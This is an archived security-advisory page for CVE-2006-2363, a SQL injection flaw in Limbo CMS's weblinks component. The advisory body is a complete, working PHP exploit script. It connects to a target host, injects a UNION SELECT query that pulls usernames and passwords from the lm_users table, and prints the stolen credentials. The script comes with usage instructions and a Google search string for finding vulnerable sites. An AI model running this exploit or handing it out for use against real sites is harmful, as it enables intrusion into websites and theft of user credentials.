SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Limbo CMS (option=weblinks) SQL injection exploit


Arrow  SecurityAlert : 893
Arrow  CVE : CVE-2006-2363
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : SnoBMSN Hotmail De
Arrow  Published : 16.05.2006

Arrow  Affected Software : Limbo CMS



Arrow  Advisory Content :  

<pre>

[i] Limbo CMS (option=weblinks) sql injection exploit

[i] Cyber-Security.ORG | Security Advisory | Security Edithor by SnoB |
Turkish hacking | security{!}

<?php

if( (!isset($_GET['host'])) || (!isset($_GET['path'])) ||
(!isset($_GET['id'])))

{

?>

[*] Usage: <?echo
htmlentities($PHP_SELF)?>?host=[hostname]&path=[limbo_path]&id=[user_id]

[*] Exemple: <?echo
htmlentities($PHP_SELF)?>?host=127.0.0.1&path=/limbo&id=1

[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"

<?php

die;

}

$host = $_GET['host'];

$path = $_GET['path'];

$id = $_GET['id'];

$success = 0;

$fp = fsockopen($host, 80, $errno, $errstr, 30);

if (!$fp) {

die("[-] Connection Error!");

}

else {

$out = "GET
$path/index.php?option=weblinks&Itemid=44&catid=-1%20union%20select%200,
1,2,concat(char(0x6c,0x6f,0x67,0x69,0x6e,0x3a),username,char(0x20,0x70,0
x61,0x73,0x73,0x77,0x6f,0x72,0x64,0x3a),password),4,5,6,7,8,9,10,11%20fr
om%20lm_users%20where%20id=$id/* HTTP/1.1rn";

$out .= "Host: $hostrn";

$out .= "Connection: Closernrn";

fwrite($fp, $out);

while (!feof($fp)) {

$f = fgets($fp, 1024);

if ( (preg_match("/<div class="componentheading" >/",$f)) &&
(preg_match("/login/",$f)) )

{

echo "$f";

echo "[+] Enjoy! :><br>";

$success = 1;

}

}

fclose($fp);

if (!$success)

echo "<br>[-] exploit failed :<<br>";

}

?>

</pre>





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.